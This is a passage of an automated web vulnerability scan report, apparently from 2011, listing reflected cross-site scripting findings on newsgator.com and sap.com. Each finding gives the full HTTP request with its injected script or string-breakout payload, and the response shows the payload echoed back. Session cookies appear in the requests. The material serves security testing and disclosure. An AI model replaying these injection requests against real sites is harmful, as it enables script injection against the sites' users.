Cookie: .ASPXANONYMOUS=ec8-iODBzAEkAAAAM2Y5ZTY3NDAtNDgzMy00YjBhLTg2N2MtMDI2ZTg1ZTFiNjg00; ASP.NET_SessionId=quu5ty45zos3ltasqk3z1c45; AWSELB=D3C9758D18503E48094C60B777CFCD5D39CEEB1CDA0FEFFE2C0F391DFDF6C6C74534A9699866360E7B3EBF67845ED5C306076FE186CD8DBCB64619CCB5BB800B271F899D32; _msuuid_559f7m7161=B83D6312-A321-4C67-9DC3-466120C36492; _mkto_trk=id:728-OGX-548&token:_mch-newsgator.com-1318692366404-89028; __utma=116641049.1396705175.1318692392.1318692392.1318692392.1; __utmb=116641049.1.10.1318692392; __utmc=116641049; __utmz=116641049.1318692392.1.1.utmcsr=newsgator.com|utmccn=(referral)|utmcmd=referral|utmcct=/Default.aspx; language=en-US

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/css; charset=utf-8
Date: Sat, 15 Oct 2011 15:31:12 GMT
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 7609
Connection: keep-alive


/*-- Slideshow Containers --*/
/*    spacing and border        */        #mss-outer-container_671 {width:180px;padding:4px;margin:0px auto;border:0px solid #ccc;overflow:hidden;}
/*                            */        #mss-container_
...[SNIP]...
-------------------------*/

/*--- Tooltip Styles ---*/
/*                            */        .tool_671-tip {float: left; border:3px solid #9AC2DB !important; padding: 5px; background: #FFFFFF !important; max-width: 200d0f9a<script>alert(1)</script>5291c05a6e9px;}
/*                            */        .tool_671-title {color:#666666 !important;font-family:Arial, Verdana, sans-serif !important;font-size:12px !important; font-weight: bold;padding: 0; margin: 0; margin-top: -15px; pad
...[SNIP]...

3.71. http://www.newsgator.com/DesktopModules/Markit.SlideShow/CSSHandler.ashx [w parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.newsgator.com
Path:   /DesktopModules/Markit.SlideShow/CSSHandler.ashx

Issue detail

The value of the w request parameter is copied into the HTML document as plain text between tags. The payload 4cbfd<script>alert(1)</script>1a6c591f3ee was submitted in the w parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /DesktopModules/Markit.SlideShow/CSSHandler.ashx?file=/DesktopModules/Markit.SlideShow/Templates/Default/template.css&bg=FCFCFC&tbcolor=CCCCCC&scbgcolor=F5F5F5&scbcolor=D0D0D0&PortalID=0&mid=671&w=1804cbfd<script>alert(1)</script>1a6c591f3ee&h=325&tw=0&th=0&sw=0&sc=11&path=/DesktopModules/Markit.SlideShow/Templates/Default&b=0&tipw=200&tipborderw=3&tiptcolor=666666&tipbcolor=9AC2DB&tipbgcolor=FFFFFF HTTP/1.1
Host: www.newsgator.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.newsgator.com/customers.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: .ASPXANONYMOUS=ec8-iODBzAEkAAAAM2Y5ZTY3NDAtNDgzMy00YjBhLTg2N2MtMDI2ZTg1ZTFiNjg00; ASP.NET_SessionId=quu5ty45zos3ltasqk3z1c45; AWSELB=D3C9758D18503E48094C60B777CFCD5D39CEEB1CDA0FEFFE2C0F391DFDF6C6C74534A9699866360E7B3EBF67845ED5C306076FE186CD8DBCB64619CCB5BB800B271F899D32; _msuuid_559f7m7161=B83D6312-A321-4C67-9DC3-466120C36492; _mkto_trk=id:728-OGX-548&token:_mch-newsgator.com-1318692366404-89028; __utma=116641049.1396705175.1318692392.1318692392.1318692392.1; __utmb=116641049.1.10.1318692392; __utmc=116641049; __utmz=116641049.1318692392.1.1.utmcsr=newsgator.com|utmccn=(referral)|utmcmd=referral|utmcct=/Default.aspx; language=en-US

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/css; charset=utf-8
Date: Sat, 15 Oct 2011 15:31:02 GMT
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 7937
Connection: keep-alive


/*-- Slideshow Containers --*/
/*    spacing and border        */        #mss-outer-container_671 {width:1804cbfd<script>alert(1)</script>1a6c591f3eepx;padding:4px;margin:0px auto;border:0px solid #ccc;overflow:hidden;}
/*                            */        #mss-container_671 {width:1804cbfd<script>
...[SNIP]...

3.72. http://www.sap.com/about-sap/company/legal/privacy.epx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sap.com
Path:   /about-sap/company/legal/privacy.epx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6627b"><script>alert(1)</script>0b3746ad6a6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /about-sap/company/legal/privacy.epx?sapmtn=emptypageforinlineframe&kNtBzmUK9zU=1&6627b"><script>alert(1)</script>0b3746ad6a6=1 HTTP/1.1
Host: www.sap.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; session=cd0b6b7c-45df-415c-9ca0-02363c80f71d; SAP.TTC=1318688442; CountryRedirectFlag=1; SelectedCountryUrl=/index.epx; 37021986-VID=546022977410; 37021986-SKEY=449600187523043155; HumanClickSiteContainerID_37021986=STANDALONE; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:04:52 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:04:52 GMT; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|INDUSTRY=INDA000018,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 15:04:52 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:05:12 GMT
Content-Length: 22166


<html>
   <head>
       <title>SAP - SAP Privacy Statement</title>    
       <meta http-equiv=Content-Type content="text/html; charset=utf-8">
       <meta id="metaContentLanguage" http-equiv="Content-Language" co
...[SNIP]...
<link rel="canonical" href="http://www.sap.com/about-sap/company/legal/privacy.epx?sapmtn=emptypageforinlineframe&kntbzmuk9zu=1&6627b"><script>alert(1)</script>0b3746ad6a6=1" />
...[SNIP]...

3.73. http://www.sap.com/global/js/addthis_widget.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sap.com
Path:   /global/js/addthis_widget.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cb837'%3b4803d0e7d8 was submitted in the REST URL parameter 1. This input was echoed as cb837';4803d0e7d8 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /globalcb837'%3b4803d0e7d8/js/addthis_widget.js?_=1318688503713 HTTP/1.1
Host: www.sap.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/javascript, application/javascript, */*; q=0.01
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
Referer: http://www.sap.com/index.epx
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; session=cd0b6b7c-45df-415c-9ca0-02363c80f71d; SAP.TTC=1318688442; CountryRedirectFlag=1; mbox=check#true#1318688544|session#1318688461599-607633#1318690344; SelectedCountryUrl=/index.epx; 37021986-VID=546022977410; 37021986-SKEY=449600187523043155; HumanClickSiteContainerID_37021986=STANDALONE

Response

HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 33243
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:22:32 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 15:22:32 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:22:31 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
<script language="Javascript">
var DOCUMENTGROUP='globalcb837';4803d0e7d8';
var DOCUMENTNAME='Error';


var _s_cf17='Global';


</script>
...[SNIP]...

3.74. http://www.sap.com/global/swf/Flash_Header_V2.swf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sap.com
Path:   /global/swf/Flash_Header_V2.swf

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9a3e9'%3b52bfc88d5b0 was submitted in the REST URL parameter 1. This input was echoed as 9a3e9';52bfc88d5b0 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /global9a3e9'%3b52bfc88d5b0/swf/Flash_Header_V2.swf HTTP/1.1
Host: www.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.sap.com/about-sap/events/worldtour/index.epx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; ASP.NET_SessionId=lses3swo01d05twdca0myv0y; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE; mbox=session#1318688512533-813903#1318690554|check#true#1318688754; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Aforums%7C1318690514391%3B%20pe%3Dno%2520value%7C1318690514393%3B%20c3%3Dno%2520value%7C1318690514395%3B%20s_nr%3D1318688714402-New%7C1321280714402%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292314404%3B%20s_visit%3D1%7C1318690514405%3B%20gpv_p47%3Dno%2520value%7C1318690514407%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D3%3B%20s_sq%3D%3B; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sapphirenow.com%2flogin.aspx%3fReturnUrl%3d%2fdefault.aspx; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|

Response

HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 34019
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:27:10 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 15:27:10 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:27:10 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
<script language="Javascript">
var DOCUMENTGROUP='global9a3e9';52bfc88d5b0';
var DOCUMENTNAME='Error';


var _s_cf17='Global';


</script>
...[SNIP]...

3.75. http://www.sap.com/global/ui/fonts/bensbk-webfont.ttf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sap.com
Path:   /global/ui/fonts/bensbk-webfont.ttf

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9e035'%3b9a389115ce5 was submitted in the REST URL parameter 1. This input was echoed as 9e035';9a389115ce5 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /global9e035'%3b9a389115ce5/ui/fonts/bensbk-webfont.ttf HTTP/1.1
Host: www.sap.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sap.com/global/ui/css/sapcom.css
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; session=cd0b6b7c-45df-415c-9ca0-02363c80f71d; SAP.TTC=1318688442; CountryRedirectFlag=1; mbox=check#true#1318688544|session#1318688461599-607633#1318690344; SelectedCountryUrl=/index.epx

Response

HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 33521
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:22:08 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 15:22:08 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:22:08 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
<script language="Javascript">
var DOCUMENTGROUP='global9e035';9a389115ce5';
var DOCUMENTNAME='Error';


var _s_cf17='Global';


</script>
...[SNIP]...

3.76. http://www.sap.com/global/ui/js/common.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sap.com
Path:   /global/ui/js/common.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 76071'%3b8141102f30b was submitted in the REST URL parameter 1. This input was echoed as 76071';8141102f30b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /global76071'%3b8141102f30b/ui/js/common.js?r=1 HTTP/1.1
Host: www.sap.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sap.com/index.epx
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; session=cd0b6b7c-45df-415c-9ca0-02363c80f71d; SAP.TTC=1318688442; CountryRedirectFlag=1; mbox=check#true#1318688530|session#1318688461599-607633#1318690330; SelectedCountryUrl=/index.epx

Response

HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 33176
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:22:00 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 15:22:00 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:21:59 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
<script language="Javascript">
var DOCUMENTGROUP='global76071';8141102f30b';
var DOCUMENTNAME='Error';


var _s_cf17='Global';


</script>
...[SNIP]...

3.77. http://www.sap.com/global/ui/js/head.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sap.com
Path:   /global/ui/js/head.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload db64f'%3b76e111cc207 was submitted in the REST URL parameter 1. This input was echoed as db64f';76e111cc207 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /globaldb64f'%3b76e111cc207/ui/js/head.js?r=1 HTTP/1.1
Host: www.sap.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sap.com/index.epx
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; session=cd0b6b7c-45df-415c-9ca0-02363c80f71d; SAP.TTC=1318688442

Response

HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 33152
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:21:21 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 15:21:21 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:21:21 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
<script language="Javascript">
var DOCUMENTGROUP='globaldb64f';76e111cc207';
var DOCUMENTNAME='Error';


var _s_cf17='Global';


</script>
...[SNIP]...

3.78. http://www.sap.com/gwtservice.epx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sap.com
Path:   /gwtservice.epx

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4f647'%3bc388078568b was submitted in the REST URL parameter 1. This input was echoed as 4f647';c388078568b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /gwtservice.epx4f647'%3bc388078568b?vid=51A3D747-8C02-417D-8F96-AE6E0DDD405D&ReturnURL=http://www.sapbusinessoptimizer.com/&campaigncode=CRM-US10-SGE-FRBUSOPT HTTP/1.1
Host: www.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sapbusinessoptimizer.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Aadvancedsearch%7C1318691731633%3B%20pe%3Dno%2520value%7C1318691731640%3B%20c3%3Dno%2520value%7C1318691731645%3B%20s_nr%3D1318689931653-New%7C1321281931653%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448293531656%3B%20s_visit%3D1%7C1318691731658%3B%20gpv_p47%3Dno%2520value%7C1318691731661%3B; 37021986-VID=5110247826455; nwt=wetnow; ARPT=ONKKMMS169.145.6.59CKMMW; session=144fe053-5592-4145-8a61-c484bd4d3e8b; CMPFIELDCRM-US11-XEC-CS11TRIAL-QUERYSTRINGFIELD=URL_ID=Q311_cs2011_freetrial_estore; CMPFIELDCRM-US11-XEC-CS11TRIAL-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2f2011_CURR_SAP_Crystal_Reports_Server_2011%2findex.epx%3fURL_ID%3dQ311_cs2011_freetrial_estore%26kNtBzmUK9zU%3d1; CMPFIELDCRM-US11-XEC-CS11TRIAL-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=False&InquiryType=Campaign&InquiryLevel=Premium&Segment=CROSS; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sapvirtualevents.com%2fteched%2fdefault.aspx%3f433fe%27%3balert(document.location)%2f%2ffea0f539288; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|

Response

HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 34382
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:30:28 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 16:30:28 GMT; path=/
Set-Cookie: CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sapbusinessoptimizer.com%2f; domain=.sap.com; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 15:30:28 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:30:27 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
<script language="Javascript">
var DOCUMENTGROUP='gwtservice.epx4f647';c388078568b?vid=51A3D747-8C02-417D-8F96-AE6E0DDD405D&ReturnURL=http:';
var DOCUMENTNAME='Error';


var _s_cf17='Global';


</script>
...[SNIP]...

3.79. http://www.sap.com/gwtservices/httpBridge.epx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sap.com
Path:   /gwtservices/httpBridge.epx

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 597d9'%3bc31b6b8d8f4 was submitted in the REST URL parameter 1. This input was echoed as 597d9';c31b6b8d8f4 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /gwtservices597d9'%3bc31b6b8d8f4/httpBridge.epx?kNtBzmUK9zU=1&action=registrationLayer&refresh=false&redirect=https%3A%2F%2Fwww.sap.com%2Fprofile%2Flogin.epx%3Fpmelayer%3Dtrue%26kNtBzmUK9zU%3D1&dialog=http://www.sap.com/common/formAbandonWarning.epx?kNtBzmUK9zU=1 HTTP/1.1
Host: www.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; ASP.NET_SessionId=lses3swo01d05twdca0myv0y; mbox=session#1318688512533-813903#1318690554|check#true#1318688754; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Aforums%7C1318690514391%3B%20pe%3Dno%2520value%7C1318690514393%3B%20c3%3Dno%2520value%7C1318690514395%3B%20s_nr%3D1318688714402-New%7C1321280714402%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292314404%3B%20s_visit%3D1%7C1318690514405%3B%20gpv_p47%3Dno%2520value%7C1318690514407%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D3%3B%20s_sq%3D%3B; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sapphirenow.com%2flogin.aspx%3fReturnUrl%3d%2fdefault.aspx; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE; 